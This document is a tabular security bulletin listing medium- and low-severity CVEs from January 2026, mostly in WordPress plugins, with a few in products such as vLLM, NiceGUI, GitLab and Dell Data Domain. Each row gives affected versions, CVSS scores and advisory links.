| tugbucket--Multi-column Tag Map | The Multi-column Tag Map plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 17.0.39 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-07 | 4.4 | CVE-2025-14057 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f151cb44-499e-4b08-80fb-0a573594d624?source=cve https://plugins.trac.wordpress.org/browser/multi-column-tag-map/trunk/mctagmap_functions.php#L1845 https://plugins.trac.wordpress.org/browser/multi-column-tag-map/tags/17.0.39/mctagmap_functions.php#L1845 https://plugins.trac.wordpress.org/browser/multi-column-tag-map/tags/17.0.39/mctagmap-options.php#L65 |
| Ubiquiti Inc--UniFi Connect EV Station Lite | An Improper Access Control could allow a malicious actor in Wi-Fi range to the EV Station Lite (v1.5.2 and earlier) to use WiFi AutoLink feature on a device that was only adopted via Ethernet. | 2026-01-05 | 5.3 | CVE-2026-21635 | https://community.ui.com/releases/Security-Advisory-Bulletin-059/0c0b7f7a-68b7-41b9-987e-554f4b40e0e6 |
| Ubiquiti Inc--UniFi Protect Application | A malicious actor with access to the adjacent network could overflow the UniFi Protect Application (Version 6.1.79 and earlier) discovery protocol causing it to restart. Affected Products: UniFi Protect Application (Version 6.1.79 and earlier). Mitigation: Update your UniFi Protect Application to Version 6.2.72 or later. | 2026-01-05 | 6.5 | CVE-2026-21634 | https://community.ui.com/releases/Security-Advisory-Bulletin-058-058/6922ff20-8cd7-4724-8d8c-676458a2d0f9 |
| ultimatemember--ForumWP Forum & Discussion Board | The ForumWP - Forum & Discussion Board plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the User's Display Name in all versions up to, and including, 2.1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-06 | 6.4 | CVE-2025-13746 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f0eb6dc5-98e2-4d88-98f8-8a63c939b047?source=cve https://plugins.trac.wordpress.org/browser/forumwp/tags/2.1.5/assets/front/js/tooltip.js#L25 https://plugins.trac.wordpress.org/browser/forumwp/tags/2.1.5/includes/common/class-user.php#L906 https://plugins.trac.wordpress.org/browser/forumwp/tags/2.1.5/templates/user-card.php#L57 |
| viitorcloudvc--Viitor Button Shortcodes | The Viitor Button Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'link' shortcode attribute in all versions up to, and including, 3.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-14113 | https://www.wordfence.com/threat-intel/vulnerabilities/id/61488a15-b49f-4381-9a35-746c39f25967?source=cve https://plugins.trac.wordpress.org/browser/viitor-shortcodes/trunk/includes/class-ww-vcsc-shortcodes.php#L51 https://plugins.trac.wordpress.org/browser/viitor-shortcodes/tags/3.0.0/includes/class-ww-vcsc-shortcodes.php#L51 |
| vikasratudi--Page Expire Popup/Redirection for WordPress | The Page Expire Popup/Redirection for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the 'id' shortcode attribute in all versions up to, and including, 1.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Author-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-01-06 | 6.5 | CVE-2025-14153 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b0c232b2-f7c8-4a8d-b282-72f61ecfc5da?source=cve https://plugins.trac.wordpress.org/browser/page-expire-popup/trunk/inc/vfpageexpirepopupstructure.php#L8 https://plugins.trac.wordpress.org/browser/page-expire-popup/tags/1.0/inc/vfpageexpirepopupstructure.php#L8 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3427583%40page-expire-popup&new=3427583%40page-expire-popup&sfp_email=&sfph_mail= |
| vllm-project--vllm | vLLM is an inference and serving engine for large language models (LLMs). In versions from 0.6.4 to before 0.12.0, users can crash the vLLM engine serving multimodal models that use the Idefics3 vision model implementation by sending a specially crafted 1x1 pixel image. This causes a tensor dimension mismatch that results in an unhandled runtime error, leading to complete server termination. This issue has been patched in version 0.12.0. | 2026-01-10 | 6.5 | CVE-2026-22773 | https://github.com/vllm-project/vllm/security/advisories/GHSA-grg2-63fw-f2qr |
| wedevs--weDocs: AI Powered Knowledge Base, Docs, Documentation, Wiki & AI Chatbot | The weDocs plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.1.15 via the `/wp-json/wp/v2/docs/settings` REST API endpoint. This makes it possible for unauthenticated attackers to extract sensitive data including third party services API keys. | 2026-01-09 | 5.3 | CVE-2025-14574 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cbca3d1e-0985-43d3-855e-eee07715f670?source=cve https://plugins.trac.wordpress.org/changeset?old_path=/wedocs/tags/2.1.15&new_path=/wedocs/tags/2.1.16#file12 |
| wisdmlabs--AI BotKit AI Chatbot & Live Support for WordPress (No-Code) | The AI BotKit - AI Chatbot & Live Support for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' parameter in the `ai_botkit_widget` shortcode in all versions up to, and including, 1.1.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-13887 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5659af1d-f248-46ff-b282-ef5397222d8d?source=cve https://plugins.trac.wordpress.org/browser/ai-botkit-for-lead-generation/trunk/includes/public/class-shortcode-handler.php#L42 https://plugins.trac.wordpress.org/browser/ai-botkit-for-lead-generation/tags/1.1.7/includes/public/class-shortcode-handler.php#L42 |
| woodpeckerleadform--Woodpecker for WordPress | The Woodpecker for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'form_name' parameter of the [woodpecker-connector] shortcode in all versions up to, and including, 3.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-09 | 6.4 | CVE-2025-13967 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1d99c8a8-daeb-402b-990d-6bacf6e9a780?source=cve https://plugins.trac.wordpress.org/browser/woodpecker/trunk/public/class-wfw-public.php#L109 https://plugins.trac.wordpress.org/browser/woodpecker/tags/3.0.4/public/class-wfw-public.php#L109 https://plugins.trac.wordpress.org/browser/woodpecker/trunk/public/partials/wfw-public-shortcode.php#L39 https://plugins.trac.wordpress.org/browser/woodpecker/tags/3.0.4/public/partials/wfw-public-shortcode.php#L39 |
| WP Swings--Wallet System for WooCommerce | Insertion of Sensitive Information Into Sent Data vulnerability in WP Swings Wallet System for WooCommerce allows Retrieve Embedded Sensitive Data.This issue affects Wallet System for WooCommerce: from n/a through 2.7.2. | 2026-01-05 | 6.3 | CVE-2025-68029 | https://vdp.patchstack.com/database/wordpress/plugin/wallet-system-for-woocommerce/vulnerability/wordpress-wallet-system-for-woocommerce-plugin-2-7-1-sensitive-data-exposure-vulnerability?_s_id=cve |
| wpcommerz--twinklesmtp Email Service Provider For WordPress | The twinklesmtp - Email Service Provider For WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via plugin's sender settings in all versions up to, and including, 1.03 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-07 | 4.4 | CVE-2025-14887 | https://www.wordfence.com/threat-intel/vulnerabilities/id/223d62cc-61ee-4818-9521-a772c1d57d59?source=cve https://plugins.trac.wordpress.org/browser/twinklesmtp/tags/1.0.3/backend/templates/views/settings/sender/default.php#L32 https://plugins.trac.wordpress.org/browser/twinklesmtp/tags/1.0.3/backend/templates/views/settings/sender/default.php#L46 https://plugins.trac.wordpress.org/browser/twinklesmtp/tags/1.0.3/backend/templates/views/settings/sender/default.php#L50 https://plugins.trac.wordpress.org/browser/twinklesmtp/tags/1.0.3/backend/templates/views/settings/sender/default.php#L84 https://plugins.trac.wordpress.org/browser/twinklesmtp/tags/1.0.3/backend/templates/views/settings/sender/default.php#L88 https://plugins.trac.wordpress.org/browser/twinklesmtp/tags/1.0.3/backend/templates/views/settings/sender/default.php#L36 |
| wpdevart--Countdown Timer Widget Countdown | The Countdown Timer - Widget Countdown plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpdevart_countdown' shortcode in all versions up to, and including, 2.7.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-10 | 6.4 | CVE-2025-14555 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ee84c720-7997-4c09-a2f9-5e1a28bd1100?source=cve https://plugins.trac.wordpress.org/browser/widget-countdown/trunk/includes/front_end.php#L167 https://plugins.trac.wordpress.org/browser/widget-countdown/trunk/includes/front_end.php#L48 https://plugins.trac.wordpress.org/browser/widget-countdown/trunk/includes/front_end.php#L30 https://plugins.trac.wordpress.org/changeset/3425959/ |
| wpdevelop--Booking Calendar | The Booking Calendar plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 10.14.10 via the `WPBC_FLEXTIMELINE_NAV` AJAX action. This is due to the nonce verification being conditionally disabled by default (`booking_is_nonce_at_front_end` option is `'Off'` by default). When the `booking_is_show_popover_in_timeline_front_end` option is enabled (which is the default in demo installations and can be enabled by administrators), it is possible for unauthenticated attackers to extract sensitive booking data including customer names, email addresses, phone numbers, and booking details. | 2026-01-09 | 5.3 | CVE-2025-14146 | https://www.wordfence.com/threat-intel/vulnerabilities/id/281a1c0e-bbd8-4cf6-94ca-b888c7d7e3af?source=cve https://plugins.trac.wordpress.org/browser/booking/tags/10.14.8/core/lib/wpbc-ajax.php#L29 https://plugins.trac.wordpress.org/browser/booking/tags/10.14.8/includes/_functions/nonce_func.php#L33 https://plugins.trac.wordpress.org/browser/booking/tags/10.14.8/core/wpbc-activation.php#L572 https://plugins.trac.wordpress.org/browser/booking/tags/10.14.8/core/timeline/v2/wpbc-class-timeline_v2.php#L3187 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3434934%40booking%2Ftrunk&old=3432649%40booking%2Ftrunk&sfp_email=&sfph_mail=#file2 |
| wpdevteam--BetterDocs Knowledge Base Documentation & FAQ Solution for Elementor & Block Editor | The BetterDocs plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.3 via the scripts() function. This makes it possible for authenticated attackers, with contributor-level access and above, to extract sensitive data including the OpenAI API key stored in plugin settings. | 2026-01-09 | 6.5 | CVE-2025-14980 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1595f231-d300-484a-a0e1-1e2bc7b82ed3?source=cve https://research.cleantalk.org/cve-2025-14980/ https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3430424%40betterdocs%2Ftags%2F4.3.4&old=3422660%40betterdocs%2Ftrunk |
| wpdevteam--Templately Elementor & Gutenberg Template Library: 6500+ Free & Pro Ready Templates And Cloud! | The Templately plugin for WordPress is vulnerable to Arbitrary File Write in all versions up to, and including, 3.4.8. This is due to inadequate input validation in the `save_template_to_file()` function where user-controlled parameters like `session_id`, `content_id`, and `ai_page_ids` are used to construct file paths without proper sanitization. This makes it possible for unauthenticated attackers to write arbitrary `.ai.json` files to locations within the uploads directory. | 2026-01-10 | 5.3 | CVE-2026-0831 | https://www.wordfence.com/threat-intel/vulnerabilities/id/778242f4-5dfa-4d72-a032-8b5521c5b8ce?source=cve https://plugins.trac.wordpress.org/browser/templately/tags/3.4.5/includes/Core/Importer/Utils/AIUtils.php#L414 https://plugins.trac.wordpress.org/browser/templately/tags/3.4.5/includes/API/AIContent.php#L38 https://plugins.trac.wordpress.org/changeset/3426051/ |
| wpeverest--User Registration & Membership Custom Registration Form Builder, Custom Login Form, User Profile, Content Restriction & Membership Plugin | The User Registration & Membership - Custom Registration Form Builder, Custom Login Form, User Profile, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.4.8. This is due to missing or incorrect nonce validation on the 'process_row_actions' function with the 'delete' action. This makes it possible for unauthenticated attackers to delete arbitrary post via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-10 | 5.4 | CVE-2025-14976 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e5495b4c-a1ac-4860-83a7-686d9436d983?source=cve https://plugins.trac.wordpress.org/browser/user-registration/tags/4.4.8/includes/abstracts/abstract-ur-list-table.php#L290 https://plugins.trac.wordpress.org/changeset/3435099/user-registration |
| wpmudev--Forminator Forms Contact Form, Payment Form & Custom Form Builder | The Forminator Forms - Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.49.1 via the 'listen_for_csv_export' function. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with access to the Forminator dashboard, to export sensitive form submission data including personally identifiable information. | 2026-01-09 | 5.3 | CVE-2025-14782 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2b28ddeb-44f5-4d19-b866-94fc2088ee6d?source=cve https://plugins.trac.wordpress.org/changeset/3423003/forminator/trunk/library/class-export.php |
| WPShop.ru--AdsPlace'r Ad Manager, Inserter, AdSense Ads | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WPShop.Ru AdsPlace'r - Ad Manager, Inserter, AdSense Ads allows DOM-Based XSS.This issue affects AdsPlace'r - Ad Manager, Inserter, AdSense Ads: from n/a through 1.1.5. | 2026-01-06 | 6.5 | CVE-2024-31088 | https://patchstack.com/database/wordpress/plugin/adsplacer/vulnerability/wordpress-adsplace-r-ad-manager-inserter-adsense-ads-plugin-1-1-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| wptb--WP Table Builder Drag & Drop Table Builder | The WP Table Builder - Drag & Drop Table Builder plugin for WordPress is vulnerable to unauthorized modification of data due to an incorrect authorization check on the save_table() function in all versions up to, and including, 2.0.19. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create new wptb-table posts. | 2026-01-09 | 4.3 | CVE-2025-13753 | https://www.wordfence.com/threat-intel/vulnerabilities/id/95f49080-2263-4f6d-9372-30137efd8e10?source=cve https://plugins.trac.wordpress.org/changeset/3432381/wp-table-builder |
| Wptexture--Image Slider Slideshow | Authorization Bypass Through User-Controlled Key vulnerability in Wptexture Image Slider Slideshow allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Image Slider Slideshow: from n/a through 1.8. | 2026-01-08 | 4.3 | CVE-2026-22489 | https://patchstack.com/database/wordpress/plugin/image-slider-slideshow/vulnerability/wordpress-image-slider-slideshow-plugin-1-8-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| WPvibes--AnyWhere Elementor Pro | Missing Authorization vulnerability in WPvibes AnyWhere Elementor Pro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects AnyWhere Elementor Pro: from n/a through 2.29. | 2026-01-05 | 4.3 | CVE-2025-31046 | https://vdp.patchstack.com/database/wordpress/theme/anywhere-elementor-pro/vulnerability/wordpress-anywhere-elementor-pro-2-29-broken-access-control-vulnerability?_s_id=cve |
| wpvibes--Form Vibes Database Manager for Forms | The Form Vibes - Database Manager for Forms plugin for WordPress is vulnerable to SQL Injection via the 'params' parameter in all versions up to, and including, 1.4.13 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-01-06 | 4.9 | CVE-2025-13409 | https://www.wordfence.com/threat-intel/vulnerabilities/id/28eb6998-be54-4cf9-8bb1-454c07151748?source=cve https://plugins.trac.wordpress.org/browser/form-vibes/tags/1.4.13/inc/modules/analytics/module.php#L62 https://plugins.trac.wordpress.org/browser/form-vibes/tags/1.4.13/inc/modules/analytics/module.php#L51 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3425061%40form-vibes&new=3425061%40form-vibes&sfp_email=&sfph_mail= |
| www15to--QR Code for WooCommerce order emails, PDF invoices, packing slips | The QR Code for WooCommerce order emails, PDF invoices, packing slips plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode in all versions up to, and including, 1.9.42 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-14626 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5b2e599c-48de-4d3a-94a3-b98badfb7a98?source=cve https://plugins.trac.wordpress.org/browser/qr-code-tag-for-wc-from-goaskle-com/tags/1.9.42/lib/qrct/QrctWp.php#L1661 https://plugins.trac.wordpress.org/browser/qr-code-tag-for-wc-from-goaskle-com/trunk/lib/qrct/QrctWp.php#L1661 |
| xagio--Xagio SEO AI Powered SEO | The Xagio SEO - AI Powered SEO plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 7.1.0.30 via the 'pixabayDownloadImage' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. | 2026-01-06 | 6.4 | CVE-2025-14438 | https://www.wordfence.com/threat-intel/vulnerabilities/id/72779dd2-04eb-445d-88a0-28a9c4d2369b?source=cve https://plugins.trac.wordpress.org/browser/xagio-seo/tags/7.1.0.29/inc/xagio_core.php#L236 https://plugins.trac.wordpress.org/browser/xagio-seo/tags/7.1.0.29/modules/seo/models/xagio_tinymce.php#L91 https://plugins.trac.wordpress.org/browser/xagio-seo/tags/7.1.0.29/modules/seo/models/xagio_tinymce.php#L135 https://plugins.trac.wordpress.org/changeset/3426300/xagio-seo#file374 |
| xwiki-contrib--macro-fullcalendar | XWiki Full Calendar Macro displays objects from the wiki on the calendar. Prior to version 2.4.6, users with the rights to view the Calendar.JSONService page (including guest users) can exploit the data leak vulnerability by accessing database info, with the exception of passwords. This issue has been patched in version 2.4.6. | 2026-01-10 | 5.3 | CVE-2025-65090 | https://github.com/xwiki-contrib/macro-fullcalendar/security/advisories/GHSA-637h-ch24-xp9m https://github.com/xwiki-contrib/macro-fullcalendar/commit/25bc14c181c9a92f493b20ac264388c7ba171884 https://jira.xwiki.org/browse/FULLCAL-82 |
| Yahei.Net--Yahei-PHP Prober | Yahei-PHP Prober 0.4.7 contains a remote HTML injection vulnerability that allows attackers to execute arbitrary HTML code through the 'speed' GET parameter. Attackers can inject malicious HTML code in the 'speed' parameter of prober.php to trigger cross-site scripting in user browser sessions. | 2026-01-07 | 6.1 | CVE-2019-25280 | Zero Science Lab Vulnerability Advisory Packet Storm Security Exploit Entry CXSecurity Vulnerability Listing IBM X-Force Vulnerability Exchange Archived Yahei-PHP Product Homepage |
| Yerootech--iDS6 DSSPro Digital Signage System | iDS6 DSSPro Digital Signage System 6.2 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without request validation. Attackers can craft malicious web pages to trick logged-in administrators into adding unauthorized users by exploiting the lack of CSRF protections. | 2026-01-06 | 4.3 | CVE-2020-36918 | ExploitDB-48990 Zero Science Lab Disclosure (ZSL-2020-5606) Archived Yeroo Tech Vendor Homepage Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange CXSecurity Vulnerability Database Entry VulnCheck Advisory: iDS6 DSSPro Digital Signage System 6.2 Cross-Site Request Forgery via User Management |
| zanderz--Recras | The Recras WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'recrasname' shortcode attribute in all versions up to, and including, 6.4.1. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-13497 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ef93491a-5965-4289-b72c-d1568ff4e6e8?source=cve https://plugins.trac.wordpress.org/browser/recras/trunk/src/OnlineBooking.php#L144 https://plugins.trac.wordpress.org/browser/recras/tags/6.4.1/src/OnlineBooking.php#L144 https://plugins.trac.wordpress.org/changeset/3432851/ |
| zauberzeug--nicegui | NiceGUI is a Python-based UI framework. From versions 2.13.0 to 3.4.1, there is a XSS risk in NiceGUI when developers pass attacker-controlled strings into ui.navigate.history.push() or ui.navigate.history.replace(). These helpers are documented as History API wrappers for updating the browser URL without page reload. However, if the URL argument is embedded into generated JavaScript without proper escaping, a crafted payload can break out of the intended string context and execute arbitrary JavaScript in the victim's browser. Applications that do not pass untrusted input into ui.navigate.history.push/replace are not affected. This issue has been patched in version 3.5.0. | 2026-01-08 | 6.1 | CVE-2026-21871 | https://github.com/zauberzeug/nicegui/security/advisories/GHSA-7grm-h62g-5m97 https://github.com/zauberzeug/nicegui/releases/tag/v3.5.0 |
| zauberzeug--nicegui | NiceGUI is a Python-based UI framework. From versions 2.22.0 to 3.4.1, an unsafe implementation in the click event listener used by ui.sub_pages, combined with attacker-controlled link rendering on the page, causes XSS when the user actively clicks on the link. This issue has been patched in version 3.5.0. | 2026-01-08 | 6.1 | CVE-2026-21872 | https://github.com/zauberzeug/nicegui/security/advisories/GHSA-m7j5-rq9j-6jj9 https://github.com/zauberzeug/nicegui/releases/tag/v3.5.0 |
| zauberzeug--nicegui | NiceGUI is a Python-based UI framework. From versions v2.10.0 to 3.4.1, an unauthenticated attacker can exhaust Redis connections by repeatedly opening and closing browser tabs on any NiceGUI application using Redis-backed storage. Connections are never released, leading to service degradation when Redis hits its connection limit. NiceGUI continues accepting new connections - errors are logged but the app stays up with broken storage functionality. This issue has been patched in version 3.5.0. | 2026-01-08 | 5.3 | CVE-2026-21874 | https://github.com/zauberzeug/nicegui/security/advisories/GHSA-mp55-g7pj-rvm2 https://github.com/zauberzeug/nicegui/commit/6c52eb2c90c4b67387c025b29646b4bc1578eb83 https://github.com/zauberzeug/nicegui/releases/tag/v3.5.0 |
| ZTE--MF258K | There is a configuration defect vulnerability in the version server of ZTE MF258K Pro products. Due to improper directory permission settings, an attacker can execute write permissions in a specific directory. | 2026-01-09 | 4.3 | CVE-2025-66315 | https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/4891644183717871638 |
Low Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| AcademySoftwareFoundation--OpenColorIO | A vulnerability was found in AcademySoftwareFoundation OpenColorIO up to 2.5.0. This issue affects the function ConvertToRegularExpression of the file src/OpenColorIO/FileRules.cpp. Performing a manipulation results in out-of-bounds read. The attack needs to be approached locally. The exploit has been made public and could be used. The patch is named ebdbb75123c9d5f4643e041314e2bc988a13f20d. To fix this issue, it is recommended to deploy a patch. The fix was added to the 2.5.1 milestone. | 2026-01-11 | 3.3 | CVE-2025-15506 | VDB-340444 | AcademySoftwareFoundation OpenColorIO FileRules.cpp ConvertToRegularExpression out-of-bounds VDB-340444 | CTI Indicators (IOB, IOC, IOA) Submit #733332 | AcademySoftwareFoundation OpenColorIO 1d77ecd Out-of-Bounds Read https://github.com/AcademySoftwareFoundation/OpenColorIO/issues/2228 https://github.com/AcademySoftwareFoundation/OpenColorIO/pull/2231 https://github.com/oneafter/1225/blob/main/uaf https://github.com/cozdas/OpenColorIO/commit/ebdbb75123c9d5f4643e041314e2bc988a13f20d https://github.com/AcademySoftwareFoundation/OpenColorIO/milestone/11 |
| aws--aws-sdk-net | AWS SDK for .NET works with Amazon Web Services to help build scalable solutions with Amazon S3, Amazon DynamoDB, Amazon Glacier, and more. From versions 4.0.0 to before 4.0.3.3, Customer applications could be configured to improperly route AWS API calls to non-existent or non-AWS hosts. This notification is related to the use of specific values for the region input field when calling AWS services. An actor with access to the environment in which the SDK is used could set the region input field to an invalid value. This issue has been patched in version 4.0.3.3. | 2026-01-10 | 3.7 | CVE-2026-22611 | https://github.com/aws/aws-sdk-net/security/advisories/GHSA-9cvc-h2w8-phrp |
| Dell--PowerProtect Data Domain with Data Domain Operating System (DD OS) Feature Release | Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.4.0.0, LTS2025 release version 8.3.1.10, LTS2024 release versions 7.13.1.0 through 7.13.1.40, LTS 2023 release versions 7.10.1.0 through 7.10.1.70, contain a Heap-based Buffer Overflow vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Denial of service. | 2026-01-09 | 2.3 | CVE-2025-46643 | https://www.dell.com/support/kbdoc/en-us/000405813/dsa-2025-415-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities |
| Dell--PowerProtect Data Domain with Data Domain Operating System (DD OS) Feature Release | Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.4.0.0, LTS2025 release version 8.3.1.10, LTS2024 release versions 7.13.1.0 through 7.13.1.40, LTS 2023 release versions 7.10.1.0 through 7.10.1.70, contain an Exposure of Sensitive Information to an Unauthorized Actor vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Information disclosure. | 2026-01-09 | 2.7 | CVE-2025-46676 | https://www.dell.com/support/kbdoc/en-us/000405813/dsa-2025-415-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 10.3 before 18.5.5, 18.6 before 18.6.3, and 18.7 before 18.7.1 that could have allowed a user to leak certain information by referencing specially crafted images that bypass asset proxy protection. | 2026-01-09 | 3.5 | CVE-2025-3950 | GitLab Issue #537697 HackerOne Bug Bounty Report #3106477 https://about.gitlab.com/releases/2026/01/07/patch-release-gitlab-18-7-1-released/ |
| HCLSoftware--BigFix IVR | Insufficient session expiration in the Web UI authentication component in HCL BigFix IVR version 4.2 allows an authenticated attacker to gain prolonged unauthorized access to protected API endpoints due to excessive expiration periods. | 2026-01-07 | 2 | CVE-2025-31962 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127753 |
| HCLSoftware--BigFix IVR | Improper authentication and missing CSRF protection in the local setup interface component in HCL BigFix IVR version 4.2 allows a local attacker to perform unauthorized configuration changes via unauthenticated administrative configuration requests. | 2026-01-07 | 2.9 | CVE-2025-31963 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127753 |
| HCLSoftware--BigFix IVR | Improper service binding configuration in internal service components in HCL BigFix IVR version 4.2 allows a privileged attacker to impact service availability via exposure of administrative services bound to external network interfaces instead of the local authentication interface. | 2026-01-07 | 2.2 | CVE-2025-31964 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127753 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1 and below contain a memory leak vulnerability in its XML MPE Parsing Path (iccFromXml). This issue is fixed in version 2.3.1.1. | 2026-01-06 | 3.3 | CVE-2026-21674 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-xww6-v3vg-4qc7 https://github.com/InternationalColorConsortium/iccDEV/issues/241 https://github.com/InternationalColorConsortium/iccDEV/commit/d7028d8f558bb681efe2b85f02eb4ca374502cbb |
| lief-project--LIEF | A security flaw has been discovered in lief-project LIEF up to 0.17.1. Affected by this issue is the function Parser::parse_binary of the file src/ELF/Parser.tcc of the component ELF Binary Parser. The manipulation results in null pointer dereference. The attack must be initiated from a local position. The exploit has been released to the public and may be used for attacks. Upgrading to version 0.17.2 can resolve this issue. The patch is identified as 81bd5d7ea0c390563f1c4c017c9019d154802978. It is recommended to upgrade the affected component. | 2026-01-10 | 3.3 | CVE-2025-15504 | VDB-340375 | lief-project LIEF ELF Binary Parser.tcc parse_binary null pointer dereference VDB-340375 | CTI Indicators (IOB, IOC, IOA) Submit #733329 | lief-project LIEF 9698ea6 Memory Corruption https://github.com/lief-project/LIEF/issues/1277 https://github.com/lief-project/LIEF/issues/1277#issuecomment-3693859001 https://github.com/oneafter/1210/blob/main/segv1 https://github.com/lief-project/LIEF/commit/81bd5d7ea0c390563f1c4c017c9019d154802978 https://github.com/lief-project/LIEF/releases/tag/0.17.2 |
| Luxul--XWR-600 | A vulnerability was found in Luxul XWR-600 up to 4.0.1. The affected element is an unknown function of the component Web Administration Interface. The manipulation of the argument Guest Network/Wireless Profile SSID results in cross site scripting. The attack may be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond with a technical statement. | 2026-01-11 | 2.4 | CVE-2025-15505 | VDB-340435 | Luxul XWR-600 Web Administration cross site scripting VDB-340435 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #727924 | Luxul XWR-600 Router Firmware Ver: 4.0.1 Cross Site Scripting https://docs.google.com/document/d/1S2f5lT0b-KE9m6xq8BY6eSixv6SgsGL1e8QQzeOkq5c/ |
